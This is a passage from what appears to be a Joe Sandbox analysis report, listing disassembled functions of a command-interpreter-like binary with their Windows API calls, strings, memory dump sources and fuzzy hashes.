                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                      • String ID: \\.\
                                                      • API String ID: 799470305-2900601889
                                                      • Opcode ID: 1d9e630e3dc056cac36988160209897b6a55c82e5470b3b56a9f5e981f117f56
                                                      • Instruction ID: b9ff8659ee4042d14d972cfa63466512e3c501d499e7e69522e915b0ec9c38ff
                                                      • Opcode Fuzzy Hash: 1d9e630e3dc056cac36988160209897b6a55c82e5470b3b56a9f5e981f117f56
                                                      • Instruction Fuzzy Hash: 4E51E732A08A8286EB60EF20D8013F9F7A1FB85B54F859936DA0E47794DF7CD445C761
                                                      Function 00007FF7E1DB8B20 Relevance: 16.8, APIs: 11, Instructions: 254COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                      • String ID:
                                                      • API String ID: 1944892715-0
                                                      • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                      • Instruction ID: 4fae3313f8db642cff3b8e40c8fdeff9bff82b40ccb9475d023abd769970c4af
                                                      • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                      • Instruction Fuzzy Hash: AAB1AD61A0964296EB24FF11A452779E7A0FF59B81FD88537CA4F47390DEBCE480C722
                                                      Function 00007FF7E1DB5458 Relevance: 16.7, APIs: 11, Instructions: 213fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC3578: _get_osfhandle.MSVCRT ref: 00007FF7E1DC3584
                                                        • Part of subcall function 00007FF7E1DC3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC359C
                                                        • Part of subcall function 00007FF7E1DC3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35C3
                                                        • Part of subcall function 00007FF7E1DC3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35D9
                                                        • Part of subcall function 00007FF7E1DC3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35ED
                                                        • Part of subcall function 00007FF7E1DC3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC3602
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DB54DE
                                                      • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF7E1DB1F7D), ref: 00007FF7E1DB552B
                                                      • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF7E1DB1F7D), ref: 00007FF7E1DB554F
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DD345F
                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7E1DB1F7D), ref: 00007FF7E1DD347E
                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7E1DB1F7D), ref: 00007FF7E1DD34C3
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DD34DB
                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7E1DB1F7D), ref: 00007FF7E1DD34FA
                                                        • Part of subcall function 00007FF7E1DC36EC: _get_osfhandle.MSVCRT ref: 00007FF7E1DC3715
                                                        • Part of subcall function 00007FF7E1DC36EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7E1DC3770
                                                        • Part of subcall function 00007FF7E1DC36EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DC3791
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                                      • String ID:
                                                      • API String ID: 1356649289-0
                                                      • Opcode ID: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                      • Instruction ID: a7cf7be8739ac7de15cf8f925d1d9c60d38a91820f3fd2e4c7bf818822b40413
                                                      • Opcode Fuzzy Hash: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                      • Instruction Fuzzy Hash: 25917376A08642A7E724EF25A402679F7E1FB89B85FC48136DA4E43794DFBCE440CB11
                                                      Function 00007FF7E1DD627C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95synchronizationCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7E1DD7251), ref: 00007FF7E1DD628E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ObjectSingleWait
                                                      • String ID: wil
                                                      • API String ID: 24740636-1589926490
                                                      • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                      • Instruction ID: d9b4ed31722e88786d684c2bba737dde0e40d30a2e71c38c5cb31365cac5cc94
                                                      • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                      • Instruction Fuzzy Hash: EE416531A0C54283F320EB15E84237DEAA1EF85781FD48232D529C66D4DFBDE8458762
                                                      Function 00007FF7E1DDCDC0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 94windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                      • String ID: $Application$System
                                                      • API String ID: 3377411628-1881496484
                                                      • Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                      • Instruction ID: 2002774bb429e8042910102ddf55a255d30db9b1c31304c6f2880f367866ebe7
                                                      • Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                      • Instruction Fuzzy Hash: 5E419D32B08B429AE714EB60E4413EDB7A5FB89749F84523ADA0E42B58EF7CD105C750
                                                      Function 00007FF7E1DB14E8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 64COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                      • String ID: :$\
                                                      • API String ID: 3961617410-1166558509
                                                      • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                      • Instruction ID: 40261a37ac5a28dfa1efb47d7dc31af5b5a233b4abae9a3bb88bdc197873f588
                                                      • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                      • Instruction Fuzzy Hash: F421BA21E0864296E714EB60B446679F7E1FF89751BC88536D91F83390DFBCE444C622
                                                      Function 00007FF7E1DB7AA0 Relevance: 15.2, APIs: 10, Instructions: 221COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectoryDriveFullNamePathTypememset
                                                      • String ID:
                                                      • API String ID: 1397130798-0
                                                      • Opcode ID: 8e7edb5b5352e80bd08ad7f08d899ebe22464f4bcaa288bcf446cfe77ebb0b3e
                                                      • Instruction ID: a57081c8e1d308c905f548089beba95f808c653a5985bebefc1e5a8f2ca59585
                                                      • Opcode Fuzzy Hash: 8e7edb5b5352e80bd08ad7f08d899ebe22464f4bcaa288bcf446cfe77ebb0b3e
                                                      • Instruction Fuzzy Hash: C991C522B08B8296EB64EB11D4427B9F3A1FB84B94FC48036DA4E47794EF7CD540C762
                                                      Function 00007FF7E1DC258C Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 85COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC06D6
                                                        • Part of subcall function 00007FF7E1DC06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC06F0
                                                        • Part of subcall function 00007FF7E1DC06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC074D
                                                        • Part of subcall function 00007FF7E1DC06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC0762
                                                      • _wcsicmp.MSVCRT ref: 00007FF7E1DC25CA
                                                      • _wcsicmp.MSVCRT ref: 00007FF7E1DC25E8
                                                      • _wcsicmp.MSVCRT ref: 00007FF7E1DC260F
                                                      • _wcsicmp.MSVCRT ref: 00007FF7E1DC2636
                                                      • _wcsicmp.MSVCRT ref: 00007FF7E1DC2650
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmp$Heap$AllocProcess
                                                      • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                      • API String ID: 3407644289-1668778490
                                                      • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                      • Instruction ID: f4a0849cc70dc785629f1a2ac7c47863f08e54f95b6dc502b8bf9c9ff0d5551d
                                                      • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                      • Instruction Fuzzy Hash: AA313A21E1860286FB15FF21E812379E694AF84B81FD48837DA4E86295DFBCE401C772
                                                      Function 00007FF7E1DE0C90 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 282COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                                      • String ID: &()[]{}^=;!%'+,`~
                                                      • API String ID: 2516562204-381716982
                                                      • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                      • Instruction ID: af7765ab362e43b2b7edcd9374711349ddfbadb440b9dad4e3a49eb61c9658dd
                                                      • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                      • Instruction Fuzzy Hash: CAC1CD32B04A5186E758EB25E8417BEBBA0FB44B95F845136EE8D43B94DF7CE090C711
                                                      Function 00007FF7E1DC7E80 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DBD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7E1DBD46E
                                                        • Part of subcall function 00007FF7E1DBD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7E1DBD485
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD4EE
                                                        • Part of subcall function 00007FF7E1DBD3F0: iswspace.MSVCRT ref: 00007FF7E1DBD54D
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD569
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD58C
                                                      • iswspace.MSVCRT ref: 00007FF7E1DC7EEE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr$Heapiswspace$AllocProcess
                                                      • String ID: A
                                                      • API String ID: 3731854180-3554254475
                                                      • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                      • Instruction ID: bd1c010b9b388b58595fccc91fe61a4f700d062647ee87abe3602ae295c908d7
                                                      • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                      • Instruction Fuzzy Hash: BFA18D6290968286E724FB21A44237DF6A0FF89791F80C536DA8D47794DFBCE451CB22
                                                      Function 00007FF7E1DDA39C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 111libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                      • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                      • API String ID: 1580871199-2613899276
                                                      • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                      • Instruction ID: 8fc4939a2ba50e37d1170f2f087fa856e5f5f3314685c41de9e01f4652afadd5
                                                      • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                      • Instruction Fuzzy Hash: 1451B471A18B8282EB10EF15E8017B9B7A4FB88B85F849236DA9E43754DF7CE401C711
                                                      Function 00007FF7E1DB7420 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                      • String ID: con
                                                      • API String ID: 689241570-4257191772
                                                      • Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                      • Instruction ID: 125f975e53fa3ec9ebf7dd3cbbf08e73f4ec1db8224c81f2a8f49c7588e34925
                                                      • Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                      • Instruction Fuzzy Hash: 6441BC32A08A4597E310EB11A44537DBBA0FB89BA1F948336DA2E437D0CFBDD8498751
                                                      Function 00007FF7E1DDA58C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97memoryfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                                      • String ID: PE
                                                      • API String ID: 2941894976-4258593460
                                                      • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                      • Instruction ID: 19e26c498af3b60797afee8d315afa36401a3064d5bc7bf0ced7d890068d6ffa
                                                      • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                      • Instruction Fuzzy Hash: A4418561A0865186EB24EB11E4123B9F7A0FB89B91F848332DE5D43B95DF7CE445CB21
                                                      Function 00007FF7E1DC0010 Relevance: 13.7, APIs: 9, Instructions: 163fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF7E1DD849D,?,?,?,00007FF7E1DDF0C7), ref: 00007FF7E1DC0045
                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7E1DDF0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DC0071
                                                      • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DC0092
                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7E1DC00A7
                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DC0148
                                                      • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7E1DC0181
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
